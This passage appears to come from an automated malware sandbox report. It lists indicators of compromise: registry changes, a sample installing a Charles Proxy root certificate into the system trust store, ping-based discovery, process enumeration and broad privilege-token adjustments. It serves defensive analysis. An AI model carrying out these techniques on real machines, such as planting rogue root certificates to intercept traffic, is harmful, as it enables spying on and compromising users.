Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url3 = "https://signin.ebay.com/ws/ebayisapi.dll"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\DatabaseComplete = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\Extensions	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows\AllowInPrivate	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\InternetRegistry	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url2 = "https://login.aliexpress.com/"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IntelliForms	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main\OperationalData = "1"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites\Order = 0c0000000a000000000000000c0000000100000000000000	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DontShowMeThisDialogAgain	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\DetectPhoneNumberCompleted = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\DynamicCodePolicy = 00000000	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\LastCleanup = 16087d21c5bdd601	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CacheLimit = "256000"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3	MicrosoftEdge.exe

Modifies system certificate store 2 TTPs 7 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

aliens.exeD5F0.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD	aliens.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 0300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd2000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576	aliens.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868	D5F0.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868\Blob = 0f000000010000001400000009b9105c5bba24343ca7f341c624e183f6ee7c1b090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b00000001000000260000005300650063007400690067006f00200028004100640064005400720075007300740029000000620000000100000020000000687fa451382278fff0c8b11f8d43d576671c6eb2bceab413fb83d965d06d2ff2140000000100000014000000adbd987a34b426f7fac42654ef03bde024cb541a1d000000010000001000000006f9583c00a763c23fb9e065a3366d5503000000010000001400000002faf3e291435468607857694df5e45b6885186820000000010000003a040000308204363082031ea003020102020101300d06092a864886f70d0101050500306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74301e170d3030303533303130343833385a170d3230303533303130343833385a306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100b7f71a33e6f200042d39e04e5bed1fbc6c0fcdb5fa23b6cede9b113397a4294c7d939fbd4abc93ed031ae38fcfe56d505ad69729945a80b0497adb2e95fdb8cabf37382d1e3e9141ad7056c7f04f3fe8329e74cac89054e9c65f0f789d9a403c0eac61aa5e148f9e87a16a50dcd79a4eaf05b3a671949c71b350600ac7139d38078602a8e9a869261890ab4cb04f23ab3a4f84d8dfce9fe1696fbbd742d76b44e4c7adee6d415f725a710837b37965a459a09437f7002f0dc29272dad03872db14a845c45d2a7db7b4d6c4eeaccd1344b7c92bdd430025fa61b9696a582311b7a7338f567559f5cd29d746b70a2b65b6d3426f15b2b87bfbefe95d53d5345a270203010001a381dc3081d9301d0603551d0e04160414adbd987a34b426f7fac42654ef03bde024cb541a300b0603551d0f040403020106300f0603551d130101ff040530030101ff3081990603551d2304819130818e8014adbd987a34b426f7fac42654ef03bde024cb541aa173a471306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74820101300d06092a864886f70d01010505000382010100b09be08525c2d623e20f9606929d41989cd9847981d91e5b14072336658fb0d877bbac416c47608351b0f9323de7fcf62613c78016a5bf5afc87cf787989219ae24c070a8635bcf2de51c4d296b7dc7e4eee70fd1c39eb0c0251142d8ebd16e0c1df4675e724adecf442b48593701067ba9d06354a18d32b7acc5142a17a63d1e6bba1c52bc236be130de6bd637e797ba7090d40ab6add8f8ac3f6f68c1a420551d445f59fa76221681520433c99e77cbd24d8a9911773883f561b313818b4710f9acdc80e9e8e2e1be18c9883cb1f31f1444cc604734976600fc7f8bd17806b2ee9cc4c0e5a9a790f200a2ed59e63261e559294d882175a7bd0bcc78f4e8604	D5F0.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868\Blob = 0400000001000000100000001d3554048578b03f42424dbf20730a3f03000000010000001400000002faf3e291435468607857694df5e45b688518681d000000010000001000000006f9583c00a763c23fb9e065a3366d55140000000100000014000000adbd987a34b426f7fac42654ef03bde024cb541a620000000100000020000000687fa451382278fff0c8b11f8d43d576671c6eb2bceab413fb83d965d06d2ff20b00000001000000260000005300650063007400690067006f0020002800410064006400540072007500730074002900000053000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f000000010000001400000009b9105c5bba24343ca7f341c624e183f6ee7c1b20000000010000003a040000308204363082031ea003020102020101300d06092a864886f70d0101050500306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74301e170d3030303533303130343833385a170d3230303533303130343833385a306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100b7f71a33e6f200042d39e04e5bed1fbc6c0fcdb5fa23b6cede9b113397a4294c7d939fbd4abc93ed031ae38fcfe56d505ad69729945a80b0497adb2e95fdb8cabf37382d1e3e9141ad7056c7f04f3fe8329e74cac89054e9c65f0f789d9a403c0eac61aa5e148f9e87a16a50dcd79a4eaf05b3a671949c71b350600ac7139d38078602a8e9a869261890ab4cb04f23ab3a4f84d8dfce9fe1696fbbd742d76b44e4c7adee6d415f725a710837b37965a459a09437f7002f0dc29272dad03872db14a845c45d2a7db7b4d6c4eeaccd1344b7c92bdd430025fa61b9696a582311b7a7338f567559f5cd29d746b70a2b65b6d3426f15b2b87bfbefe95d53d5345a270203010001a381dc3081d9301d0603551d0e04160414adbd987a34b426f7fac42654ef03bde024cb541a300b0603551d0f040403020106300f0603551d130101ff040530030101ff3081990603551d2304819130818e8014adbd987a34b426f7fac42654ef03bde024cb541aa173a471306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74820101300d06092a864886f70d01010505000382010100b09be08525c2d623e20f9606929d41989cd9847981d91e5b14072336658fb0d877bbac416c47608351b0f9323de7fcf62613c78016a5bf5afc87cf787989219ae24c070a8635bcf2de51c4d296b7dc7e4eee70fd1c39eb0c0251142d8ebd16e0c1df4675e724adecf442b48593701067ba9d06354a18d32b7acc5142a17a63d1e6bba1c52bc236be130de6bd637e797ba7090d40ab6add8f8ac3f6f68c1a420551d445f59fa76221681520433c99e77cbd24d8a9911773883f561b313818b4710f9acdc80e9e8e2e1be18c9883cb1f31f1444cc604734976600fc7f8bd17806b2ee9cc4c0e5a9a790f200a2ed59e63261e559294d882175a7bd0bcc78f4e8604	D5F0.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868\Blob = 19000000010000001000000045ed9bbc5e43d3b9ecd63c060db78e5c0f000000010000001400000009b9105c5bba24343ca7f341c624e183f6ee7c1b090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b00000001000000260000005300650063007400690067006f00200028004100640064005400720075007300740029000000620000000100000020000000687fa451382278fff0c8b11f8d43d576671c6eb2bceab413fb83d965d06d2ff2140000000100000014000000adbd987a34b426f7fac42654ef03bde024cb541a1d000000010000001000000006f9583c00a763c23fb9e065a3366d5503000000010000001400000002faf3e291435468607857694df5e45b688518680400000001000000100000001d3554048578b03f42424dbf20730a3f20000000010000003a040000308204363082031ea003020102020101300d06092a864886f70d0101050500306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74301e170d3030303533303130343833385a170d3230303533303130343833385a306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100b7f71a33e6f200042d39e04e5bed1fbc6c0fcdb5fa23b6cede9b113397a4294c7d939fbd4abc93ed031ae38fcfe56d505ad69729945a80b0497adb2e95fdb8cabf37382d1e3e9141ad7056c7f04f3fe8329e74cac89054e9c65f0f789d9a403c0eac61aa5e148f9e87a16a50dcd79a4eaf05b3a671949c71b350600ac7139d38078602a8e9a869261890ab4cb04f23ab3a4f84d8dfce9fe1696fbbd742d76b44e4c7adee6d415f725a710837b37965a459a09437f7002f0dc29272dad03872db14a845c45d2a7db7b4d6c4eeaccd1344b7c92bdd430025fa61b9696a582311b7a7338f567559f5cd29d746b70a2b65b6d3426f15b2b87bfbefe95d53d5345a270203010001a381dc3081d9301d0603551d0e04160414adbd987a34b426f7fac42654ef03bde024cb541a300b0603551d0f040403020106300f0603551d130101ff040530030101ff3081990603551d2304819130818e8014adbd987a34b426f7fac42654ef03bde024cb541aa173a471306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74820101300d06092a864886f70d01010505000382010100b09be08525c2d623e20f9606929d41989cd9847981d91e5b14072336658fb0d877bbac416c47608351b0f9323de7fcf62613c78016a5bf5afc87cf787989219ae24c070a8635bcf2de51c4d296b7dc7e4eee70fd1c39eb0c0251142d8ebd16e0c1df4675e724adecf442b48593701067ba9d06354a18d32b7acc5142a17a63d1e6bba1c52bc236be130de6bd637e797ba7090d40ab6add8f8ac3f6f68c1a420551d445f59fa76221681520433c99e77cbd24d8a9911773883f561b313818b4710f9acdc80e9e8e2e1be18c9883cb1f31f1444cc604734976600fc7f8bd17806b2ee9cc4c0e5a9a790f200a2ed59e63261e559294d882175a7bd0bcc78f4e8604	D5F0.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868\Blob = 5c0000000100000004000000000800000400000001000000100000001d3554048578b03f42424dbf20730a3f03000000010000001400000002faf3e291435468607857694df5e45b688518681d000000010000001000000006f9583c00a763c23fb9e065a3366d55140000000100000014000000adbd987a34b426f7fac42654ef03bde024cb541a620000000100000020000000687fa451382278fff0c8b11f8d43d576671c6eb2bceab413fb83d965d06d2ff20b00000001000000260000005300650063007400690067006f0020002800410064006400540072007500730074002900000053000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f000000010000001400000009b9105c5bba24343ca7f341c624e183f6ee7c1b19000000010000001000000045ed9bbc5e43d3b9ecd63c060db78e5c20000000010000003a040000308204363082031ea003020102020101300d06092a864886f70d0101050500306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74301e170d3030303533303130343833385a170d3230303533303130343833385a306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100b7f71a33e6f200042d39e04e5bed1fbc6c0fcdb5fa23b6cede9b113397a4294c7d939fbd4abc93ed031ae38fcfe56d505ad69729945a80b0497adb2e95fdb8cabf37382d1e3e9141ad7056c7f04f3fe8329e74cac89054e9c65f0f789d9a403c0eac61aa5e148f9e87a16a50dcd79a4eaf05b3a671949c71b350600ac7139d38078602a8e9a869261890ab4cb04f23ab3a4f84d8dfce9fe1696fbbd742d76b44e4c7adee6d415f725a710837b37965a459a09437f7002f0dc29272dad03872db14a845c45d2a7db7b4d6c4eeaccd1344b7c92bdd430025fa61b9696a582311b7a7338f567559f5cd29d746b70a2b65b6d3426f15b2b87bfbefe95d53d5345a270203010001a381dc3081d9301d0603551d0e04160414adbd987a34b426f7fac42654ef03bde024cb541a300b0603551d0f040403020106300f0603551d130101ff040530030101ff3081990603551d2304819130818e8014adbd987a34b426f7fac42654ef03bde024cb541aa173a471306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74820101300d06092a864886f70d01010505000382010100b09be08525c2d623e20f9606929d41989cd9847981d91e5b14072336658fb0d877bbac416c47608351b0f9323de7fcf62613c78016a5bf5afc87cf787989219ae24c070a8635bcf2de51c4d296b7dc7e4eee70fd1c39eb0c0251142d8ebd16e0c1df4675e724adecf442b48593701067ba9d06354a18d32b7acc5142a17a63d1e6bba1c52bc236be130de6bd637e797ba7090d40ab6add8f8ac3f6f68c1a420551d445f59fa76221681520433c99e77cbd24d8a9911773883f561b313818b4710f9acdc80e9e8e2e1be18c9883cb1f31f1444cc604734976600fc7f8bd17806b2ee9cc4c0e5a9a790f200a2ed59e63261e559294d882175a7bd0bcc78f4e8604	D5F0.exe

Runs ping.exe 1 TTPs 4 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXE

pid process

1220 PING.EXE
2560 PING.EXE
3584 PING.EXE
2096 PING.EXE

pid	process
1220	PING.EXE
2560	PING.EXE
3584	PING.EXE
2096	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

1605715653158.exe1605715657408.exe1605715663049.exejfiag3g_gg.exe1605715665799.exe1021C014A4C9A552.tmpseed.exe

pid	process
1396	1605715653158.exe
1396	1605715653158.exe
3488	1605715657408.exe
3488	1605715657408.exe
1268	1605715663049.exe
1268	1605715663049.exe
1308	jfiag3g_gg.exe
1308	jfiag3g_gg.exe
2860	1605715665799.exe
2860	1605715665799.exe
2480	1021C014A4C9A552.tmp
2480	1021C014A4C9A552.tmp
2464	seed.exe
2464	seed.exe
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352
2352

Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

MicrosoftEdgeCP.exeseed.exe

pid process

3540 MicrosoftEdgeCP.exe
2464 seed.exe

pid	process
3540	MicrosoftEdgeCP.exe
2464	seed.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

jg2_2qua.exemsiexec.exemsiexec.exe

description	pid	process
Token: SeManageVolumePrivilege	2116	jg2_2qua.exe
Token: SeManageVolumePrivilege	2116	jg2_2qua.exe
Token: SeShutdownPrivilege	1124	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1124	msiexec.exe
Token: SeSecurityPrivilege	1016	msiexec.exe
Token: SeCreateTokenPrivilege	1124	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	1124	msiexec.exe
Token: SeLockMemoryPrivilege	1124	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1124	msiexec.exe
Token: SeMachineAccountPrivilege	1124	msiexec.exe
Token: SeTcbPrivilege	1124	msiexec.exe
Token: SeSecurityPrivilege	1124	msiexec.exe
Token: SeTakeOwnershipPrivilege	1124	msiexec.exe
Token: SeLoadDriverPrivilege	1124	msiexec.exe
Token: SeSystemProfilePrivilege	1124	msiexec.exe
Token: SeSystemtimePrivilege	1124	msiexec.exe
Token: SeProfSingleProcessPrivilege	1124	msiexec.exe
Token: SeIncBasePriorityPrivilege	1124	msiexec.exe
Token: SeCreatePagefilePrivilege	1124	msiexec.exe
Token: SeCreatePermanentPrivilege	1124	msiexec.exe
Token: SeBackupPrivilege	1124	msiexec.exe
Token: SeRestorePrivilege	1124	msiexec.exe
Token: SeShutdownPrivilege	1124	msiexec.exe
Token: SeDebugPrivilege	1124	msiexec.exe
Token: SeAuditPrivilege	1124	msiexec.exe
Token: SeSystemEnvironmentPrivilege	1124	msiexec.exe
Token: SeChangeNotifyPrivilege	1124	msiexec.exe
Token: SeRemoteShutdownPrivilege	1124	msiexec.exe
Token: SeUndockPrivilege	1124	msiexec.exe
Token: SeSyncAgentPrivilege	1124	msiexec.exe
Token: SeEnableDelegationPrivilege	1124	msiexec.exe
Token: SeManageVolumePrivilege	1124	msiexec.exe
Token: SeImpersonatePrivilege	1124	msiexec.exe
Token: SeCreateGlobalPrivilege	1124	msiexec.exe
Token: SeCreateTokenPrivilege	1124	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	1124	msiexec.exe
Token: SeLockMemoryPrivilege	1124	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1124	msiexec.exe
Token: SeMachineAccountPrivilege	1124	msiexec.exe
Token: SeTcbPrivilege	1124	msiexec.exe
Token: SeSecurityPrivilege	1124	msiexec.exe
Token: SeTakeOwnershipPrivilege	1124	msiexec.exe
Token: SeLoadDriverPrivilege	1124	msiexec.exe
Token: SeSystemProfilePrivilege	1124	msiexec.exe
